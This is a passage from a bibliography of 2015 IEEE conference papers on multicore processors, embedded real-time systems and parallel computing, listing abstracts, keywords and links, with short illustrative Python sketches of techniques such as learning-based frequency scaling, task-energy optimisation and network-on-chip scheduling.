Keywords: cache storage; graphics processing units; CPU-GPGPU heterogeneous system; buffer filter; cache replacement policies; cache-sensitive CPU applications; general-purpose graphics processing unit; last-level cache management policy; memory access; memory latency tolerance; on-chip resources; shared LLC management policy; Benchmark testing; Central Processing Unit; Instruction sets; Memory management; Multicore processing; Parallel processing; System performance; heterogeneous system; multicore; shared last-level cache (ID#: 16-9391)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336174&isnumber=7336120

 

Muhammad Mahbub ul Islam, F.; Man Lin, "A Framework for Learning Based DVFS Technique Selection and Frequency Scaling for Multi-core Real-Time Systems," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 721-726, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.313

Abstract: Multi-core processors have become very popular in recent years due to their higher throughput and lower energy consumption compared with unicore processors. They are widely used in portable devices and real-time systems. Despite this enormous potential, limited battery capacity restricts their use, and improving system-level energy management therefore remains a major research area. In order to reduce energy consumption, dynamic voltage and frequency scaling (DVFS) has been commonly used in modern processors. Previously, we used reinforcement learning to scale voltage and frequency based on task execution characteristics. We also designed a learning-based method to choose a suitable DVFS technique to execute in different states. In this paper, we propose a generalized framework that integrates these two approaches for real-time systems on multi-core processors. The framework is generalized in the sense that it can work with different scheduling policies and existing DVFS techniques.

Keywords: learning (artificial intelligence); multiprocessing systems; power aware computing; real-time systems; dynamic voltage and frequency scaling; learning-based DVFS technique selection; multicore processor; multicore real-time system; reinforcement learning-based method; system level energy management; unicore processor; Energy consumption; Heuristic algorithms; Multicore processing; Power demand; Program processors; Real-time systems; Vehicle dynamics; Dynamic voltage and frequency scaling; Energy efficiency; Machine learning; Multi-core processors; time systems (ID#: 16-9392)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336243&isnumber=7336120
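
In the spirit of the learning-based frequency scaling described above, the sketch below runs tabular Q-learning over discretized load states and frequency-level actions, with a reward that penalizes energy (cubic in frequency under voltage scaling) and deadline misses. The states, constants and workload model are illustrative assumptions, not the paper's formulation.

```python
import random

FREQS = [0.4, 0.6, 0.8, 1.0]             # normalized frequency levels (actions)
STATES = range(4)                        # discretized utilization bins (states)
Q = {(s, a): 0.0 for s in STATES for a in range(len(FREQS))}
alpha, gamma, eps = 0.1, 0.9, 0.1        # learning rate, discount, exploration

def reward(freq, missed_deadline):
    # Dynamic power scales roughly with f^3 under voltage/frequency scaling;
    # a deadline miss carries a large penalty.
    return -(freq ** 3) - (10.0 if missed_deadline else 0.0)

def step(state, util):
    a = (random.randrange(len(FREQS)) if random.random() < eps
         else max(range(len(FREQS)), key=lambda x: Q[(state, x)]))
    f = FREQS[a]
    missed = util > f                    # toy model: miss if demand > speed
    r = reward(f, missed)
    next_state = min(int(util * len(STATES)), len(STATES) - 1)
    best_next = max(Q[(next_state, x)] for x in range(len(FREQS)))
    Q[(state, a)] += alpha * (r + gamma * best_next - Q[(state, a)])
    return next_state

s = 0
for _ in range(10_000):
    s = step(s, random.random())         # random synthetic workload
print(max(Q.items(), key=lambda kv: kv[1]))
```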

 

Ying Li; Jianwei Niu; Meikang Qiu; Xiang Long, "Optimizing Tasks Assignment on Heterogeneous Multi-core Real-Time Systems with Minimum Energy," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 577-582, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.126

Abstract: The main challenge for embedded real-time systems, especially mobile devices, is the trade-off between system performance and energy efficiency. By studying the relationship between the energy consumption, execution time and completion probability of tasks on heterogeneous multi-core architectures, we propose an Accelerated Search algorithm based on dynamic programming to obtain a combination of task schemes that can be completed in a given time, with a given confidence probability, while consuming the minimum possible energy. We adopt a DAG (Directed Acyclic Graph) to represent the precedence relations between tasks and develop a Minimum-Energy Model to find the optimal task assignment. Heterogeneous multi-core architectures can execute tasks at different voltage levels with DVFS, which leads to different execution times and energy consumption. The experimental results demonstrate that our approach outperforms state-of-the-art algorithms in this field (maximum improvement of 24.6%).

Keywords: directed graphs; dynamic programming; embedded systems; energy conservation; energy consumption; mobile computing; multiprocessing systems; power aware computing; probability; search problems; DAG; DVFS; accelerated search algorithm; confidence probability; directed acyclic graph; dynamic programming; embedded real-time systems; energy consumption; energy efficiency; execution time; heterogeneous multicore real-time systems; minimum energy model; mobile devices; precedent relation; system performance; task assignment optimization; task completion probability; voltage level; Algorithm design and analysis; Dynamic programming; Energy consumption; Heuristic algorithms; Multicore processing; Real-time systems; Time factors; heterogeneous multi-core real-time system; minimum energy; probability statistics; tasks assignment (ID#: 16-9393)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336220&isnumber=7336120
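
The core time/energy trade-off can be illustrated with a small dynamic program: for a chain of tasks, each with several (time, energy) execution options, minimize total energy subject to a deadline. The paper's Accelerated Search handles general DAGs and completion probabilities; the sketch below shows only the basic recurrence, with invented numbers.

```python
def min_energy(tasks, deadline):
    """dp[t] = least energy to finish the tasks processed so far using
    exactly t time ticks; each task contributes one of its options."""
    INF = float("inf")
    dp = [0.0] + [INF] * deadline
    for options in tasks:                    # options: list of (time, energy)
        ndp = [INF] * (deadline + 1)
        for t in range(deadline + 1):
            if dp[t] == INF:
                continue
            for (dt, e) in options:
                if t + dt <= deadline:
                    ndp[t + dt] = min(ndp[t + dt], dp[t] + e)
        dp = ndp
    return min(dp)                           # best energy within the deadline

# Hypothetical options per task: big core (fast, hungry), little core
# (slow, frugal), DVFS-throttled big core. Numbers are illustrative.
tasks = [[(2, 8.0), (4, 3.0), (3, 5.0)],
         [(1, 4.0), (3, 1.5), (2, 2.5)],
         [(2, 6.0), (5, 2.0), (3, 4.0)]]
print(min_energy(tasks, deadline=9))
```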

 

Aguilar, M.A.; Eusse, J.F.; Leupers, R.; Ascheid, G.; Odendahl, M., "Extraction of Kahn Process Networks from While Loops in Embedded Software," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1078-1085, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.158

Abstract: Many embedded applications, such as multimedia, signal processing and wireless communications, exhibit a stream-processing behavior. In order to take full advantage of modern multi- and many-core embedded platforms, these applications have to be parallelized by describing them in a given parallel Model of Computation (MoC). One of the most prominent MoCs is the Kahn Process Network (KPN), as it allows multiple forms of parallelism to be expressed and is suitable for efficient mapping and scheduling onto parallel embedded platforms. However, describing streaming applications manually as a KPN is a challenging task, especially since they spend most of their execution time in loops with an unbounded number of iterations. These loops are in several cases implemented as while loops, which are difficult to analyze. In this paper, we present an approach to guide the derivation of KPNs from embedded streaming applications dominated by multiple types of while loops. We evaluate the applicability of our approach on a commercial eight-DSP-core embedded platform using realistic benchmarks. Results measured on the platform show that we are able to speed up sequential benchmarks on average by a factor of up to 4.3x and in the best case up to 7.7x. Additionally, to evaluate the effectiveness of our approach, we compared it against a state-of-the-art parallelization framework.

Keywords: digital signal processing chips; embedded systems; parallel processing; program control structures; DSP core embedded platform; KPN; Kahn process network extraction; MoC; embedded software; embedded streaming applications; execution time; many-core embedded platforms; multicore embedded platforms; parallel embedded platforms; parallel model-of-computation; parallelized applications; sequential benchmarks; while loops; Computational modeling; Data mining; Long Term Evolution; Parallel processing; Runtime; Switches; Uplink; DSP; Kahn Process Networks; MPSoCs; Parallelization; While Loops (ID#: 16-9394)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336312&isnumber=7336120
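
The KPN structure itself is easy to picture: deterministic processes connected by FIFO channels with blocking reads. Below is a minimal Python sketch — our illustration, not the authors' tool output — in which a streaming while loop is split into source, worker, and sink processes; the process names and the end-of-stream token are assumptions.

# Minimal Kahn-process-network sketch: each process is a thread that blocks
# on FIFO reads, mirroring how a streaming while loop can be split into
# producer/worker/consumer processes.
import threading, queue

def source(out):
    for sample in range(5):                # stands in for an unbounded while loop
        out.put(sample)
    out.put(None)                          # end-of-stream token

def worker(inp, out):
    while True:
        sample = inp.get()                 # blocking read: Kahn semantics
        if sample is None:
            out.put(None)
            break
        out.put(sample * sample)           # per-sample "kernel"

def sink(inp):
    while True:
        sample = inp.get()
        if sample is None:
            break
        print("result:", sample)

a, b = queue.Queue(), queue.Queue()        # FIFO channels
threads = [threading.Thread(target=source, args=(a,)),
           threading.Thread(target=worker, args=(a, b)),
           threading.Thread(target=sink, args=(b,))]
for t in threads: t.start()
for t in threads: t.join()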

 

Rushaidat, K.; Schwiebert, L.; Jackman, B.; Mick, J.; Potoff, J., "Evaluation of Hybrid Parallel Cell List Algorithms for Monte Carlo Simulation," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1859-1864, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.260

Abstract: This paper describes efficient, scalable parallel implementations of the conventional cell list method and a modified cell list method to calculate the total system intermolecular Lennard-Jones force interactions in the Monte Carlo Gibbs ensemble. We targeted this part of the Gibbs ensemble for optimization because it is the most computationally demanding part of the force interactions in the simulation, as it involves all the molecules in the system. The modified cell list implementation reduces the number of particles that are outside the interaction range by making the cells smaller, thus reducing the number of unnecessary distance evaluations. Evaluation of the two cell list methods is done using a hybrid MPI+OpenMP approach and a hybrid MPI+CUDA approach. The cell list methods are evaluated on a small cluster of multicore CPUs, Intel Phi coprocessors, and GPUs. The performance results are evaluated using different combinations of MPI processes, threads, and problem sizes.

Keywords: Monte Carlo methods; application program interfaces; cellular biophysics; graphics processing units; intermolecular forces; materials science computing; message passing; multi-threading; parallel architectures; GPU; Intel Phi coprocessors; Monte Carlo Gibbs ensemble; Monte Carlo simulation; conventional-cell list method; distance evaluations; force interactions; hybrid MPI-plus-CUDA approach; hybrid MPI-plus-OpenMP approach; hybrid parallel cell list algorithm evaluation; modified cell list implementation; multicore CPU; performance evaluation; scalable-parallel implementations; total system intermolecular Lennard-Jones force interactions; Computational modeling; Force; Graphics processing units; Microcell networks; Monte Carlo methods; Solid modeling; Cell List; Gibbs Ensemble; Hybrid Parallel Architectures; Monte Carlo Simulations (ID#: 16-9395)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336443&isnumber=7336120
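
The conventional cell-list trick the authors build on is compact enough to sketch: bin particles into cells at least one cutoff wide, then restrict pair evaluation to neighboring cells. The 2-D, single-threaded Python sketch below is ours; the box size, cutoff, and Lennard-Jones parameters are illustrative, and the paper's hybrid MPI/OpenMP/CUDA machinery is omitted.

import random, itertools

BOX, RCUT, EPS, SIG = 10.0, 2.5, 1.0, 1.0
ncell = int(BOX // RCUT)                     # cells at least one cutoff wide
cell_w = BOX / ncell

def lj(r2):                                  # Lennard-Jones pair energy from r^2
    s6 = (SIG * SIG / r2) ** 3
    return 4.0 * EPS * s6 * (s6 - 1.0)

random.seed(1)
parts = [(random.uniform(0, BOX), random.uniform(0, BOX)) for _ in range(200)]
cells = {}
for i, (x, y) in enumerate(parts):           # bin particles into cells
    cells.setdefault((int(x // cell_w), int(y // cell_w)), []).append(i)

energy = 0.0
for (cx, cy), members in cells.items():
    for dx, dy in itertools.product((-1, 0, 1), repeat=2):
        nb = cells.get(((cx + dx) % ncell, (cy + dy) % ncell), [])
        for i in members:
            for j in nb:
                if j <= i:                   # count each pair once
                    continue
                rx = parts[i][0] - parts[j][0]
                ry = parts[i][1] - parts[j][1]
                rx -= BOX * round(rx / BOX)  # minimum-image convention
                ry -= BOX * round(ry / BOX)
                r2 = rx * rx + ry * ry
                if r2 < RCUT * RCUT:
                    energy += lj(r2)
print("total LJ energy:", energy)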

 

Peng Sun; Chandrasekaran, S.; Suyang Zhu; Chapman, B., "Deploying OpenMP Task Parallelism on Multicore Embedded Systems with MCA Task APIs," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 843-847, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.88

Abstract: Heterogeneous multicore embedded systems are rapidly growing, with cores of varying types and capacity. Programming these devices and exploiting the hardware has been a real challenge. Existing programming models and their runtimes are typically meant for general-purpose computation and are mostly too heavy to be adopted for resource-constrained embedded systems. Embedded programmers are still expected to use low-level and proprietary APIs, making the resulting software less and less portable. These challenges motivated us to explore how OpenMP, a high-level directive-based model, could be used for embedded platforms. In this paper, we translate OpenMP to the Multicore Association Task Management API (MTAPI), which is a standard API for leveraging task parallelism on embedded platforms. Our results demonstrate that the performance of our OpenMP runtime library is comparable to state-of-the-art task-parallel solutions. We believe this approach will provide a portable solution, since it abstracts the low-level details of the hardware and no longer depends on vendor-specific APIs.

Keywords: application program interfaces; embedded systems; multiprocessing systems; parallel processing; MCA; MTAPI; OpenMP runtime library; OpenMP task parallelism; heterogeneous multicore embedded system; high-level directive-based model; multicore association task management API; multicore embedded system; resource-constrained embedded system; vendor-specific API; Computational modeling; Embedded systems; Hardware; Multicore processing; Parallel processing; Programming; Heterogeneous Multicore Embedded Systems; MTAPI; OpenMP; Parallel Computing (ID#: 16-9396)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336267&isnumber=7336120
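
MTAPI itself is a C API, so rather than guess at its signatures, the sketch below illustrates only the task-parallel pattern being translated — independent tasks submitted to a runtime and joined later — using a generic Python pool. The fib workload is the classic tasking example, and the worker count is an arbitrary stand-in for the embedded cores.

# Illustrative sketch of the task-parallel pattern the paper maps from
# OpenMP onto MTAPI (this is a generic pool, not the MTAPI interface).
from concurrent.futures import ThreadPoolExecutor

def fib(n):                                # classic OpenMP tasking example
    return n if n < 2 else fib(n - 1) + fib(n - 2)

with ThreadPoolExecutor(max_workers=4) as pool:          # "cores" of the target
    tasks = [pool.submit(fib, n) for n in range(20, 25)] # task creation
    results = [t.result() for t in tasks]                # taskwait-style join
print(results)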

 

Xu, T.C.; Leppanen, V.; Liljeberg, P.; Plosila, J.; Tenhunen, H., "Trio: A Triple Class On-chip Network Design for Efficient Multicore Processors," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 951-956, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.44

Abstract: We propose and analyse an on-chip interconnect design for improving the efficiency of multicore processors. Conventional interconnection networks are usually based on a single homogeneous network with uniform processing of all traffic. While this simplifies the design, the approach can have performance bottlenecks and limit system efficiency. We investigate the traffic patterns of several real-world applications. Based on a directory cache coherence protocol, we characterise and categorize the traffic in terms of various aspects. We discover that control and unicast packets dominate the network, while the percentages of data and multicast messages are relatively low. Furthermore, we find that most invalidation messages are multicast messages, and most multicast messages are invalidation messages. The multicast invalidation messages usually have a higher number of destination nodes than other multicast messages. These observations lead to the proposed triple-class interconnect, where a dedicated multicast-capable network is responsible for the control messages and the data messages are handled by another network. Using a detailed full-system simulation environment, the proposed design is compared with the homogeneous baseline network, as well as two other network designs. Experimental results show that the average network latency and energy-delay product of the proposed design improve by 24.4% and 10.2%, respectively, compared with the baseline network.

Keywords: cache storage; multiprocessing systems; multiprocessor interconnection networks; network synthesis; network-on-chip; Trio; average network latency; dedicated multicast-capable network; destination nodes; directory cache coherence protocol; energy delay product; full system simulation environment; homogeneous baseline network; multicast invalidation messages; multicore processors; on-chip interconnect design; traffic pattern; triple class on-chip network design; unicast packets; Coherence; Multicore processing; Ports (Computers); Program processors; Protocols; System-on-chip; Unicast; cache; design; efficient; multicore; network-on-chip (ID#: 16-9397)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336293&isnumber=7336120
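
The classification step at the heart of the design can be pictured as a small dispatch function: multicast and invalidation traffic goes to a dedicated multicast-capable network, other control messages to a control network, and cache-line payloads to a data network. The sketch below is our illustration; the Packet fields and message kinds are made up, whereas the real design classifies coherence-protocol messages in hardware.

# Sketch of the Trio idea: classify packets by type and steer each class
# to its own sub-network. Field names are illustrative only.
from collections import namedtuple

Packet = namedtuple("Packet", "kind dests payload")

def route(packet):
    if packet.kind == "invalidate" or len(packet.dests) > 1:
        return "multicast-capable control network"
    if packet.kind == "control":
        return "control network"
    return "data network"                  # wide links for cache-line payloads

traffic = [Packet("control", [3], None),
           Packet("invalidate", [1, 2, 5, 7], None),
           Packet("data", [4], b"\x00" * 64)]
for p in traffic:
    print(p.kind, "->", route(p))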

 

Rao, N.S.V.; Towsley, D.; Vardoyan, G.; Settlemyer, B.W.; Foster, I.T.; Kettimuthu, R., "Sustained Wide-Area TCP Memory Transfers over Dedicated Connections," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1603-1606, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.86

Abstract: Wide-area memory transfers between on-going computations and remote steering, analysis and visualization sites can be utilized in several High-Performance Computing (HPC) scenarios. Dedicated network connections with high capacity, low loss rates and low competing traffic are typically provisioned over current HPC infrastructures to support such transfers. To gain insights into such transfers, we collected throughput measurements for different versions of TCP between dedicated multi-core servers over emulated 10 Gbps connections with round trip times (rtt) in the range 0-366 ms. Existing TCP models and measurements over shared links are well known to exhibit monotonically decreasing, convex throughput profiles as rtt is increased. In sharp contrast, our measurements show two distinct regimes: a concave profile at lower rtts and a convex profile at higher rtts. We present analytical results that explain these regimes: (a) at lower rtt, rapid throughput increase due to slow start leads to the concave profile, and (b) at higher rtt, the TCP congestion avoidance phase, with slower dynamics, dominates. In both cases, however, we analytically show that throughput decreases with rtt, albeit at different rates, as confirmed by the measurements. These results provide practical TCP solutions for these transfers without requiring additional hardware or software, unlike Infiniband and UDP solutions, respectively.

Keywords: network servers; parallel processing; sustainable development; telecommunication congestion control; telecommunication links; telecommunication traffic; transport protocols; wide area networks; HPC; concave profile; congestion avoidance; convex profile; dedicated connection; high-performance computing; multicore server; remote steering; shared link; sustained wide area TCP memory transfer; visualization site; Current measurement; Data transfer; Hardware; Linux; Software; Supercomputers; Throughput; TCP; dedicated connections; memory transfers; throughput measurements (ID#: 16-9398)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336397&isnumber=7336120
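
A back-of-envelope model reproduces the monotone decrease the authors measure: for a fixed-size transfer, count round trips under slow start up to a capped window, bounding each burst by the line rate. The sketch below is ours, with illustrative constants (window cap, transfer size, 10 Gb/s link); it deliberately omits loss and the congestion-avoidance dynamics analyzed in the paper.

# Count round trips for a fixed-size memory transfer: slow start (doubling)
# up to a capped steady window, with each burst bounded by the line rate.
MSS = 1500.0                  # bytes per segment
WMAX = 8192                   # window cap, in segments
SIZE = 2e9                    # 2 GB transfer
LINK = 10e9 / 8               # 10 Gb/s dedicated connection, in bytes/s

def transfer_time(rtt_s):
    sent, cwnd, t = 0.0, 1, 0.0
    while sent < SIZE:
        burst = cwnd * MSS
        sent += burst
        t += max(rtt_s, burst / LINK)   # one window per RTT, bounded by line rate
        cwnd = min(cwnd * 2, WMAX)      # slow start, then a capped steady window
    return t

for rtt_ms in (1, 10, 50, 100, 200, 366):
    thr = SIZE / transfer_time(rtt_ms / 1000.0) * 8 / 1e9
    print(f"rtt={rtt_ms:4d} ms  ->  {thr:6.2f} Gb/s")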

 

Shekhar, M.; Ramaprasad, H.; Mueller, F., "Evaluation of Memory Access Arbitration Algorithm on Tilera's TILEPro64 Platform," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1154-1159, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.245

Abstract: As real-time embedded systems demand more and more computing power under reasonable energy budgets, multi-core platforms are a viable option. However, deploying real-time applications on multi-core platforms introduces several predictability challenges. One of these challenges is bounding the latency of memory accesses issued by real-time tasks. This challenge is exacerbated as the number of cores and, hence, the degree of resource sharing increases. Over the last several years, researchers have proposed techniques to overcome this challenge. In prior work, we proposed an arbitration policy for memory access requests over a Network-on-Chip. In this paper, we implement and evaluate variants of our arbitration policy on a real hardware platform, namely Tilera's TilePro64.

Keywords: embedded systems; multiprocessing systems; network-on-chip; storage management; TILEPro64 platform; memory access arbitration algorithm; multicore platforms; network-on-chip; real-time embedded systems; Dynamic scheduling; Engines; Hardware; Instruction sets; Memory management; Real-time systems; System-on-chip (ID#: 16-9399)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336325&isnumber=7336120

 

Gunes, V.; Givargis, T., "XGRID: A Scalable Many-Core Embedded Processor," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1143-1146, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.99

Abstract: The demand for compute cycles needed by embedded systems is rapidly increasing. In this paper, we introduce the XGRID embedded many-core system-on-chip architecture. XGRID makes use of a novel, FPGA-like, programmable interconnect infrastructure, offering scalability and deterministic communication using hardware-supported message passing among cores. Our experiments with XGRID are very encouraging. A number of parallel benchmarks are evaluated on the XGRID processor using the application mapping technique described in this work. We validate our scalability claim by running our benchmarks on XGRID configurations with varying core counts. We also validate our assertions on the XGRID architecture by comparing XGRID against the Graphite many-core architecture, showing that XGRID outperforms Graphite.

Keywords: embedded systems; field programmable gate arrays; multiprocessing systems; parallel architectures; system-on-chip; FPGA-like, programmable interconnect infrastructure; XGRID embedded many-core system-on-chip architecture; application mapping technique; compute cycles; core count; deterministic communication; hardware supported message passing; parallel benchmarks; scalable many-core embedded processor; Benchmark testing; Communication channels; Discrete cosine transforms; Field programmable gate arrays; Multicore processing; Switches; Embedded Processors; Many-core; Multi-core; System-on-Chip Architectures (ID#: 16-9400)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336323&isnumber=7336120

 

Jia Tian; Wei Hu; Chunqiang Li; Tianpei Li; Wenjun Luo, "Multi-thread Connection Based Scheduling Algorithm for Network on Chip," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on,  pp. 1473-1478, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.160

Abstract: More and more cores are integrated onto a single chip to improve performance and reduce power consumption without increasing the CPU frequency. The cores are connected by links and organized as a network, called a network on chip (NOC), a promising paradigm. NOC has improved CPU performance without increased power consumption. However, a new problem remains: how to schedule threads onto the different cores to take full advantage of the NOC. In this paper, we propose a new multi-thread scheduling algorithm based on thread connections for NOC. The connection relationships among threads are analyzed and the threads are divided into thread sets. At the same time, the network topology of the NOC is analyzed: the connection relationships of the cores are set in the NOC model and the cores are divided into regions. Thread sets and core regions are then matched according to their features, and the scheduling algorithm maps thread sets to the corresponding core regions. Within a core region, the threads of a set are scheduled via appropriate approaches. Experiments show that the proposed algorithm can improve program performance and enhance the utilization of NOC cores.

Keywords: multi-threading; network theory (graphs); network-on-chip; performance evaluation; power aware computing; processor scheduling; CPU; NOC core; multithread connection based scheduling; multithread connection-based scheduling algorithm; network topology; network-on-chip; power consumption; Algorithm design and analysis; Heuristic algorithms; Instruction sets; Multicore processing; Network topology; Scheduling algorithms; System-on-chip; Algorithm; Network on Chip; Scheduling; Thread Connection (ID#: 16-9401)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336376&isnumber=7336120
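
The matching idea can be sketched in a few lines: cluster threads whose mutual communication exceeds a threshold (a simple union-find over the heaviest edges), then hand each cluster a contiguous region of the mesh. Everything below — the communication weights, the threshold, and the 4x4 mesh split into 2x2 quadrants — is our illustrative stand-in for the paper's analysis.

# Group heavily-communicating threads into sets, then map each set onto a
# contiguous region of a NoC mesh so its traffic stays local.
comm = {("t0", "t1"): 9, ("t1", "t2"): 8, ("t3", "t4"): 7,
        ("t2", "t3"): 1, ("t4", "t5"): 6, ("t0", "t5"): 1}

parent = {}
def find(x):                                  # union-find with path halving
    parent.setdefault(x, x)
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x

for (a, b), w in sorted(comm.items(), key=lambda kv: -kv[1]):
    if w >= 5:                                # "tightly connected" threshold
        parent[find(a)] = find(b)

sets = {}
for t in {x for edge in comm for x in edge}:
    sets.setdefault(find(t), []).append(t)

# Core regions: the four 2x2 quadrants of a 4x4 mesh.
regions = [[(r, c) for r in rows for c in cols]
           for rows in ((0, 1), (2, 3)) for cols in ((0, 1), (2, 3))]
for thread_set, region in zip(sets.values(), regions):
    print(sorted(thread_set), "->", region)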

 

Yuxiang Li; Yinliang Zhao; Huan Gao, "Using Artificial Neural Network for Predicting Thread Partitioning in Speculative Multithreading," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 823-826, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.28

Abstract: Speculative multithreading (SpMT) is a thread-level automatic parallelization technique to accelerate sequential programs on multi-cores. It partitions programs into multiple threads to be speculatively executed in the presence of ambiguous data and control dependences, while the correctness of the programs is guaranteed by hardware support. Thread granularity, the number of parallel threads and partition positions are crucial to the performance improvement in SpMT, for they determine the amount of resources (CPU, memory, cache, waiting cycles, etc.) and affect the efficiency of every PE (Processing Element). Conventionally, these three parameters are determined by heuristic rules. Although partitioning threads with heuristic rules is simple, they are a one-size-fits-all strategy and cannot guarantee an optimal thread partitioning. This paper proposes an Artificial Neural Network (ANN) based approach to learn and determine the thread partition strategy. Using the ANN-based thread partition approach, an unseen irregular program can obtain a stable, much higher speedup than with the Heuristic Rules (HR) based approach. On Prophet, a generic SpMT processor for evaluating the performance of multithreaded programs, the novel thread partitioning policy reaches an average speedup of 1.80 on a 4-core processor. Experiments show that our proposed approach obtains a significant increase in speedup, and the Olden benchmarks deliver a performance improvement of 2.36% over the traditional heuristic-rules-based approach. The results indicate that our approach finds the best partitioning scheme for each program and is more stable across programs.

Keywords: multi-threading; multiprocessing systems; neural nets; ANN-based thread partition approach; HR based approach; Olden benchmark; PE; Prophet; SpMT processor; artificial neural network; heuristic rules; multicore; multithreaded programs; one-size-fits-all strategy; parallel threads; partition position; processing element; sequential programs; speculative multithreading; thread granularity; thread partitioning policy; thread partitioning prediction; thread-level automatic parallelization technique; Cascading style sheets; Conferences; Cyberspace; Embedded software; High performance computing; Safety; Security; Machine learning; Prophet; speculative multithreading; thread partitioning (ID#: 16-9402)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336262&isnumber=7336120
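
The learning setup is conventional enough to mock up: map a feature vector describing a program region to a partition parameter with a small neural network. The toy below is ours, with synthetic data, a made-up linear target, and a hand-rolled one-hidden-layer network; it shows only the regression mechanics, not the Prophet features or training corpus.

# Toy version of the idea: learn a mapping from simple program features
# (e.g., loop count, call depth, dependence count) to a partition parameter.
import numpy as np

rng = np.random.default_rng(0)
X = rng.random((200, 3))                                       # normalized features
y = (0.6 * X[:, 0] - 0.3 * X[:, 1] + 0.1 * X[:, 2])[:, None]   # synthetic target

W1, b1 = rng.normal(0.0, 0.5, (3, 8)), np.zeros(8)
W2, b2 = rng.normal(0.0, 0.5, (8, 1)), np.zeros(1)
for _ in range(2000):                                          # batch gradient descent
    h = np.tanh(X @ W1 + b1)                                   # hidden layer
    err = (h @ W2 + b2) - y                                    # prediction error
    gW2, gb2 = h.T @ err / len(X), err.mean(0)
    gh = (err @ W2.T) * (1.0 - h ** 2)                         # backprop through tanh
    gW1, gb1 = X.T @ gh / len(X), gh.mean(0)
    for p, g in ((W1, gW1), (b1, gb1), (W2, gW2), (b2, gb2)):
        p -= 0.5 * g                                           # fixed learning rate
pred = np.tanh(X @ W1 + b1) @ W2 + b2
print("training MSE:", float(((pred - y) ** 2).mean()))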

 

Yanyan Shen; Elphinstone, K., "Microkernel Mechanisms for Improving the Trustworthiness of Commodity Hardware," in Dependable Computing Conference (EDCC), 2015 Eleventh European, pp. 155-166, 7-11 Sept. 2015. doi: 10.1109/EDCC.2015.16

Abstract: Trustworthy isolation is required to consolidate safety and security critical software systems on a single hardware platform. Recent advances in formally verifying correctness and isolation properties of a microkernel should enable mutually distrusting software to co-exist on the same platform with a high level of assurance of correct operation. However, commodity hardware is susceptible to transient faults triggered by cosmic rays, and alpha particle strikes, and thus may invalidate the isolation guarantees, or trigger failure in isolated applications. To increase trustworthiness of commodity hardware, we apply redundant execution techniques from the dependability community to a modern microkernel. We leverage the hardware redundancy provided by multicore processors to perform transient fault detection for applications and for the microkernel itself. This paper presents the mechanisms and framework for microkernel based systems to implement redundant execution for improved trustworthiness. It evaluates the performance of the resulting system on x86-64 and ARM platforms.

